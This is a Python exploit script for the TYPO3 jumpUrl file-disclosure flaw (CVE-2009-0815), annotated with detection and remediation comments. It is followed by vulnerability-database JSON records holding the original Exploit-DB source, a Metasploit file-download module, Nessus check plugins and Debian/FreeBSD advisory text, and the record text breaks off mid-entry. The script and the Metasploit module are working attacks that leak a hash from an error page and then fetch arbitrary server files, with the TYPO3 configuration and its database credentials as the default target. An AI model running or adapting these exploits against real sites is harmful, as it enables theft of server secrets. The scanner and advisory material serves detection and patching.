#!/usr/bin/env python
#
# ------------------------------------------------------------------------------
# TYPO3-SA-2009-002 exploit by Lolek of TK53 <lolek1337 _at_ gmail.com>
# date: 2009/02/10
# vendor url: http://typo3.org
# vulnerable versions: TYPO3 < 4.2.6, TYPO3 < 4.1.10, TYPO3 < 4.0.12
# usage:
# typo3-sa-2009-002.py <host> <file> (defaults to typo3conf/localconf.php)
#
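# note: patching alone is not enough. if an installation was fixed but its typo3
# security key (the encryption key set in the install tool) was not changed, anyone
# who obtained the key earlier can still precompute valid hashes, so the key has to
# be changed as well.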
#
# greetings to milw0rm, roflek
import urllib,re,sys
# Captures the hash value from the jumpurl error text. Per CVE-2009-0815 the
# affected TYPO3 versions echo the expected juHash in that error message, so a
# response body containing "Calculated juHash, ..., did not" marks an unpatched
# installation and is a useful string to alert on in outbound HTTP responses.
strip = re.compile(
    r'.*Calculated juHash, ([a-z0-9]+), did not.*'
)
def useme():
    """Print the one-line usage text and terminate the process.

    The process exits with status 0 although this is only reached when the
    required <host> argument is missing, so a wrapper script cannot tell a
    usage error from a successful run by exit code.
    """
    usage = '<host> (with http://) <file> (defaults to typo3conf/localconf.php)'
    print('%s %s' % (sys.argv[0], usage))
    sys.exit(0)
def parsehash(host, f):
    """Request the jumpurl error page for *f* and return the hash it echoes.

    Sends a GET to ``<host>/index.php`` with ``jumpurl=<f>``, ``type=0``,
    ``juSecure=1`` and ``locationData=1:`` but no ``juHash``. The response
    body is tested against the module-level ``strip`` pattern with
    ``match()``, which anchors at the start of the body.

    Returns the captured hash string, or None when the request raised or the
    pattern did not match (the caller treats None as "already fixed or
    failed").

    Detection note: in web-server access logs this step is a request to
    index.php carrying ``juSecure=1`` and a ``jumpurl`` that names a local
    file while ``juHash`` is absent. The header of this file lists the fixed
    releases as 4.0.12, 4.1.10 and 4.2.6.
    """
    query = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '1:'})
    target = host + '/index.php?' + query
    try:
        body = urllib.urlopen(target).read()
    except Exception as e:
        # Any fetch error is reported and turned into "no hash".
        print('%s %s' % ('[!] - ', str(e)))
        return None

    found = strip.match(body)
    return found.group(1) if found else None
def content(host, hash, f):
    """Repeat the jumpurl request with *hash* attached and print the reply.

    Builds the same query as ``parsehash`` plus ``juHash=<hash>`` and writes
    the raw response body to stdout. Nothing checks that the body really is
    the requested file, so an error page is printed the same way.

    Every exception, including KeyboardInterrupt and SystemExit, is caught
    by the bare ``except`` and reported only as ``[!] - FAIL``.

    Detection note: the second request differs from the first only by the
    added ``juHash`` parameter, so two consecutive index.php requests with
    the same ``jumpurl``, the second one carrying ``juHash``, is the log
    signature of this file-disclosure sequence.
    """
    query = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '1:', 'juHash' : hash})
    target = host + '/index.php?' + query
    try:
        response = urllib.urlopen(target)
        print('%s %s' % ('[+] - content of:', f))
        print(response.read())
    except:
        print('[!] - FAIL')
def main():
    """Command-line entry point: read <host> and optional <file>, run both steps.

    argv[1] is the base URL of the installation, argv[2] the path to request
    (``typo3conf/localconf.php`` when omitted). Without a host the usage text
    is printed and the process exits. If ``parsehash`` returns nothing the
    process exits with status 234; otherwise ``content`` is called with the
    returned hash.

    Remediation note: the default path is the TYPO3 configuration file, so a
    host that answered this sequence should be treated as having its
    configuration secrets exposed and have them changed after upgrading.
    """
    argv = sys.argv
    if len(argv) < 2:
        useme()

    target_file = argv[2] if len(argv) >= 3 else 'typo3conf/localconf.php'

    print('[+] - TYPO3-SA-2009-002 exploit by Lolek of TK53')
    print('[+] - checking typo3 installation on...')

    leaked = parsehash(argv[1], target_file)
    if not leaked:
        print('[!] - version already fixed or 42 went wrong while trying to get the hash')
        sys.exit(234)

    content(argv[1], leaked, target_file)
# Script guard: main() runs only when the file is executed directly, so
# importing the module performs no network requests.
if __name__ == '__main__':
    main()
# milw0rm.com [2009-02-10]
{"id": "EDB-ID:8038", "hash": "c7248e8a48e2cba71f8b21e54e3be662", "type": "exploitdb", "bulletinFamily": "exploit", "title": "TYPO3 < 4.0.12/4.1.10/4.2.6 jumpUrl Remote File Disclosure Exploit", "description": "TYPO3 < 4.0.12/4.1.10/4.2.6 (jumpUrl) Remote File Disclosure Exploit. CVE-2009-0815. Webapps exploit for php platform", "published": "2009-02-10T00:00:00", "modified": "2009-02-10T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/8038/", "reporter": "Lolek", "references": [], "cvelist": ["CVE-2009-0815"], "lastseen": "2016-02-01T04:36:59", "history": [], "viewCount": 10, "enchantments": {"score": {"value": 5.6, "vector": "NONE", "modified": "2016-02-01T04:36:59"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0815"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/HTTP/TYPO3_SA_2009_002"]}, {"type": "dsquare", "idList": ["E-8"]}, {"type": "nessus", "idList": ["TYPO3_JUMPURL_INFO_DISCLOSURE.NASL", "DEBIAN_DSA-1720.NASL", "FREEBSD_PKG_CC47FAFEF82311DD94D90030843D3802.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231063356", "OPENVAS:136141256231063393", "OPENVAS:1361412562310803989", "OPENVAS:63356", "OPENVAS:63393"]}, {"type": "freebsd", "idList": ["CC47FAFE-F823-11DD-94D9-0030843D3802"]}], "modified": "2016-02-01T04:36:59"}, "vulnersScore": 5.6}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/8038/", "sourceData": "#!/usr/bin/env python\r\n#\r\n# ------------------------------------------------------------------------------\r\n# TYPO3-SA-2009-002 exploit by Lolek of TK53 <lolek1337 _at_ gmail.com>\r\n# date: 2009/02/10\r\n# vendor url: http://typo3.org\r\n# vulnerable versions: TYPO3 < 4.2.6, TYPO3 < 4.1.10, TYPO3 < 4.0.12\r\n# usage:\r\n# typo3-sa-2009-002.py <host> <file> (defaults to typo3conf/localconf.php)\r\n#\r\n# if people fixed their installations but did not update the typo3 security 
key\r\n# you should be able to precompute the hashes if you previously got the security key.\r\n#\r\n# greetings to milw0rm, roflek\r\n\r\nimport urllib,re,sys\r\n\r\nstrip = re.compile(r'.*Calculated juHash, ([a-z0-9]+), did not.*')\r\n\r\ndef useme():\r\n print sys.argv[0], '<host> (with http://) <file> (defaults to typo3conf/localconf.php)'\r\n sys.exit(0)\r\n\r\ndef parsehash(host, f):\r\n file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '1:'})\r\n url = host + '/index.php?' + file\r\n try:\r\n s = urllib.urlopen(url)\r\n r = s.read()\r\n except Exception, e:\r\n print '[!] - ', str(e)\r\n return None\r\n\r\n tmp = strip.match(r)\r\n if tmp:\r\n return tmp.group(1)\r\n else:\r\n return None\r\n\r\ndef content(host, hash, f):\r\n file = urllib.urlencode({'jumpurl' : f, 'type' : 0, 'juSecure': 1, 'locationData' : '1:', 'juHash' : hash})\r\n url = host + '/index.php?' + file\r\n try:\r\n s = urllib.urlopen(url)\r\n print '[+] - content of:', f\r\n print s.read()\r\n except:\r\n print '[!] - FAIL'\r\n\r\ndef main():\r\n if len(sys.argv) < 2:\r\n useme()\r\n\r\n if len(sys.argv) < 3:\r\n file = 'typo3conf/localconf.php'\r\n else:\r\n file = sys.argv[2]\r\n\r\n print '[+] - TYPO3-SA-2009-002 exploit by Lolek of TK53'\r\n print '[+] - checking typo3 installation on...'\r\n\r\n hash = parsehash(sys.argv[1], file)\r\n\r\n if not hash:\r\n print '[!] - version already fixed or 42 went wrong while trying to get the hash'\r\n sys.exit(234)\r\n\r\n content(sys.argv[1], hash, file)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n# milw0rm.com [2009-02-10]\r\n", "osvdbidlist": ["52048"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:57", "bulletinFamily": "NVD", "description": "The jumpUrl mechanism in class.tslib_fe.php in TYPO3 3.3.x through 3.8.x, 4.0 before 4.0.12, 4.1 before 4.1.10, 4.2 before 4.2.6, and 4.3alpha1 leaks a hash secret (juHash) in an error message, which allows remote attackers to read arbitrary files by including the hash in a request.", "modified": "2010-04-27T04:00:00", "id": "CVE-2009-0815", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0815", "published": "2009-03-05T02:30:00", "title": "CVE-2009-0815", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2019-11-20T23:08:03", "bulletinFamily": "exploit", "description": "This module exploits a file disclosure vulnerability in the jumpUrl mechanism of Typo3. This flaw can be used to read any file that the web server user account has access to.\n", "modified": "2017-07-24T13:26:21", "published": "2009-03-15T02:32:34", "id": "MSF:AUXILIARY/ADMIN/HTTP/TYPO3_SA_2009_002", "href": "", "type": "metasploit", "title": "Typo3 sa-2009-002 File Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Typo3 sa-2009-002 File Disclosure',\n 'Description' => %q{\n This module exploits a file disclosure vulnerability in the jumpUrl mechanism of\n Typo3. 
This flaw can be used to read any file that the web server user account has\n access to.\n\n },\n 'Author' => [ 'spinbad <spinbad.security[at]googlemail.com>' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['OSVDB', '52048'],\n ['CVE', '2009-0815'],\n ['URL', 'http://secunia.com/advisories/33829/'],\n ['EDB', '8038'],\n ['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/'],\n ],\n 'DisclosureDate' => 'Feb 10 2009',\n 'Actions' =>\n [\n ['Download']\n ],\n 'DefaultAction' => 'Download'\n ))\n\n register_options(\n [\n OptString.new('URI', [true, \"Typo3 Path\", \"/\"]),\n OptString.new('RFILE', [true, \"The remote file to download\", 'typo3conf/localconf.php']),\n OptString.new('LFILE',[true, \"The local filename to store the data\", \"localconf.php\"]),\n ])\n end\n\n def run\n print_status(\"Establishing a connection to the target...\")\n\n error_uri = datastore['URI'] + \"/index.php?jumpurl=\" +datastore['RFILE'] +\"&juSecure=1&type=0&locationData=1:\"\n ju_hash = nil\n\n res = send_request_raw({\n 'uri' => error_uri,\n 'method' => 'GET',\n 'headers' =>\n {\n 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',\n 'Connection' => 'Close',\n }\n }, 25)\n\n if (res and res.message == \"OK\")\n res.body =~ /jumpurl Secure: Calculated juHash, ((\\w)+), did not match the submitted juHash./\n\n if $1.nil?\n print_error(\"Error while getting juHash. 
Maybe the version is already patched...\")\n return\n end\n\n ju_hash = $1\n print_status(\"Getting juHash from error message: #{ju_hash}\")\n\n else\n print_error(\"No response from the server.\")\n return\n end\n\n\n file_uri = datastore['URI'] + \"/index.php?jumpurl=\" +datastore['RFILE'] +\"&juSecure=1&type=0&juHash=#{ju_hash}&locationData=1:\"\n print_status(\"Trying to get #{datastore['RFILE']}.\")\n\n file = send_request_raw({\n 'uri' => file_uri,\n 'method' => 'GET',\n 'headers' =>\n {\n 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',\n 'Connection' => 'Close',\n }\n },25)\n\n if (file and file.message = \"OK\")\n if file.body == 'jumpurl Secure: \"' + datastore['RFILE'] + '\" was not a valid file!'\n print_error(\"File #{datastore['RFILE']} does not exist.\")\n return\n end\n\n print_status(\"Writing local file #{datastore['LFILE']}.\")\n open(datastore['LFILE'],'w') {|f| f << file.body }\n else\n print_error(\"Error while getting file.\")\n end\n\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/typo3_sa_2009_002.rb"}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "description": "type a short description of the vulnerability here\n\nVulnerability Type: File Disclosure", "modified": "2013-04-02T00:00:00", "published": "2012-01-26T00:00:00", "id": "E-8", "href": "", "type": "dsquare", "title": "Typo3 FD", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2019-12-13T09:44:24", "bulletinFamily": "scanner", "description": "The ", "modified": "2019-12-02T00:00:00", "id": "TYPO3_JUMPURL_INFO_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/35655", "published": "2009-02-12T00:00:00", "title": "TYPO3 'jumpUrl' Mechanism Information 
Disclosure", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35655);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/11/15 20:50:19\");\n\n script_cve_id(\"CVE-2009-0815\");\n script_bugtraq_id(33714);\n script_xref(name:\"EDB-ID\", value:\"8038\");\n\n script_name(english:\"TYPO3 'jumpUrl' Mechanism Information Disclosure\");\n script_summary(english:\"Attempts to read 'typo3conf/localconf.php'.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is affected by an\ninformation disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The 'jumpUrl' mechanism in the version of TYPO3 installed on the\nremote host, which is used to track access, exposes the value of a\nhash secret used to validate requests. An unauthenticated, remote\nattacker can leverage this issue to view the contents of arbitrary\nfiles on the remote host subject to the privileges of the web server\nuser id.\");\n # https://typo3.org/security/advisory/typo3-sa-2009-002/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6fdf4cd6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to TYPO3 version 4.0.12 / 4.1.10 / 4.2.6 or later, or patch\nthe installation as discussed in the project's advisory referenced\nabove.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Typo3 FD\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\nscript_cwe_id(200);\n\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2009/02/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:typo3:typo3\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"typo3_detect.nasl\");\n script_require_keys(\"installed_sw/TYPO3\",\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\ninclude(\"url_func.inc\");\ninclude(\"data_protection.inc\");\n\napp = \"TYPO3\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\ndir = install['path'];\ninstall_url = build_url(qs:dir, port:port);\n\n# file = \"/etc/passwd\";\n# file_pat = \"root:.*:0:[01]:\";\nfile = \"typo3conf/localconf.php\";\nfile_pat = \"\\$typo_db_(password|username) *=\";\n\n# Call up the registration page.\nurl =\n \"/?\" +\n \"jumpurl=\" + urlencode(str:file) + \"&\" +\n \"juSecure=1&\" +\n \"type=0&\" +\n \"locationData=\" + urlencode(str:\"3:\");\n\nres = http_send_recv3(method:\"GET\", item:dir+url, port:port, exit_on_fail:TRUE);\n\n# Grab the hash.\njuhash = NULL;\n\npat = \"Calculated juHash, ([a-z0-9]+), did not\";\nmatches = egrep(pattern:pat, string:res[2]);\nif (matches)\n{\n foreach match (split(matches, keep:FALSE))\n {\n item = eregmatch(pattern:pat, string:match);\n if (!empty_or_null(item[1]))\n {\n juhash = item[1];\n break;\n }\n }\n}\nif (empty_or_null(juhash)) exit(0, \"Unable to extract juHash from \"+ install_url + url);\n\n# Now read the file.\nurl2 = url + \"&juHash=\" + 
juhash;\n\nres2 = http_send_recv3(method:\"GET\", item:dir+url2, port:port, exit_on_fail:TRUE);\n\n# There's a problem if we see the expected contents.\nif (egrep(pattern:file_pat, string:res2[2]))\n{\n if (report_verbosity > 0)\n {\n res2[2] = data_protection::redact_etc_passwd(output:res2[2]);\n report =\n '\\n' + 'Nessus was able to exploit the issue to retrieve the contents of' +\n '\\n' + \"'\" + file + \"'\" + ' on the remote host using the following URLs :' +\n '\\n' +\n '\\n' + ' ' + install_url + url + \n '\\n' + ' ' + install_url + url2 + \n '\\n';\n if (report_verbosity > 1)\n {\n snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n report +=\n '\\n' + 'Here are its contents :\\n' +\n '\\n' + snip +\n res2[2] + '\\n' +\n snip;\n }\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-13T06:51:05", "bulletinFamily": "scanner", "description": "Several remote vulnerabilities have been discovered in the TYPO3 web\ncontent management framework.\n\nMarcus Krause and Michael Stucki from the TYPO3 security team\ndiscovered that the jumpUrl mechanism discloses secret hashes enabling\na remote attacker to bypass access control by submitting the correct\nvalue as a URL parameter and thus being able to read the content of\narbitrary files.\n\nJelmer de Hen and Dmitry Dulepov discovered multiple cross-site\nscripting vulnerabilities in the backend user interface allowing\nremote attackers to inject arbitrary web script or HTML.\n\nAs it is very likely that your encryption key has been exposed we\nstrongly recommend to change your encryption key via the install tool\nafter installing the update.", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DSA-1720.NASL", "href": "https://www.tenable.com/plugins/nessus/35638", "published": "2009-02-12T00:00:00", 
"title": "Debian DSA-1720-1 : typo3-src - several vulnerabilities", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1720. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35638);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/08/02 13:32:21\");\n\n script_cve_id(\"CVE-2009-0815\", \"CVE-2009-0816\");\n script_xref(name:\"DSA\", value:\"1720\");\n\n script_name(english:\"Debian DSA-1720-1 : typo3-src - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in the TYPO3 web\ncontent management framework.\n\nMarcus Krause and Michael Stucki from the TYPO3 security team\ndiscovered that the jumpUrl mechanism discloses secret hashes enabling\na remote attacker to bypass access control by submitting the correct\nvalue as a URL parameter and thus being able to read the content of\narbitrary files.\n\nJelmer de Hen and Dmitry Dulepov discovered multiple cross-site\nscripting vulnerabilities in the backend user interface allowing\nremote attackers to inject arbitrary web script or HTML.\n\nAs it is very likely that your encryption key has been exposed we\nstrongly recommend to change your encryption key via the install tool\nafter installing the update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514713\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1720\"\n );\n script_set_attribute(\n 
attribute:\"solution\", \n value:\n\"Upgrade the typo3 package.\n\nFor the stable distribution (etch) these problems have been fixed in\nversion 4.0.2+debian-8.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Typo3 FD\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_cwe_id(79, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:typo3-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/03/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/02/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"typo3\", reference:\"4.0.2+debian-8\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"typo3-src-4.0\", reference:\"4.0.2+debian-8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-13T07:32:14", "bulletinFamily": "scanner", "description": "Secunia reports :\n\nSome vulnerabilities have been reported in Typo3, which can be\nexploited by malicious people to conduct cross-site scripting attacks\nand disclose sensitive information.\n\nInput passed via unspecified fields to the backend user interface is\nnot properly sanitised before being returned to the user. 
This can be\nexploited to execute arbitrary HTML and script code in a user", "modified": "2019-12-02T00:00:00", "id": "FREEBSD_PKG_CC47FAFEF82311DD94D90030843D3802.NASL", "href": "https://www.tenable.com/plugins/nessus/35641", "published": "2009-02-12T00:00:00", "title": "FreeBSD : typo3 -- XSS and information disclosure (cc47fafe-f823-11dd-94d9-0030843d3802)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35641);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2019/08/02 13:32:40\");\n\n script_cve_id(\"CVE-2009-0815\", \"CVE-2009-0816\");\n script_xref(name:\"Secunia\", value:\"33829\");\n\n script_name(english:\"FreeBSD : typo3 -- XSS and information disclosure (cc47fafe-f823-11dd-94d9-0030843d3802)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Secunia reports :\n\nSome vulnerabilities have been reported in Typo3, which can be\nexploited by malicious people to conduct cross-site scripting attacks\nand disclose sensitive information.\n\nInput passed via unspecified fields to the backend user interface is\nnot properly sanitised before being returned to the user. 
This can be\nexploited to execute arbitrary HTML and script code in a user's\nbrowser session in context of an affected site.\n\nAn error in the 'jumpUrl' mechanism can be exploited to read arbitrary\nfiles from local resources by disclosing a hash secret used to\nrestrict file access.\"\n );\n # http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e6914b0f\"\n );\n # https://vuxml.freebsd.org/freebsd/cc47fafe-f823-11dd-94d9-0030843d3802.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c0497b0f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Typo3 FD\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_cwe_id(79, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:typo3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/02/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/02/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"typo3<4.2.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:17", "bulletinFamily": "unix", "description": "\nSecunia reports:\n\nSome vulnerabilities have been reported in Typo3, which can be\n\t exploited by malicious people to conduct cross-site scripting attacks\n\t and disclose sensitive information.\nInput passed via unspecified fields to the backend user interface\n\t is not properly sanitised before being returned to the user. 
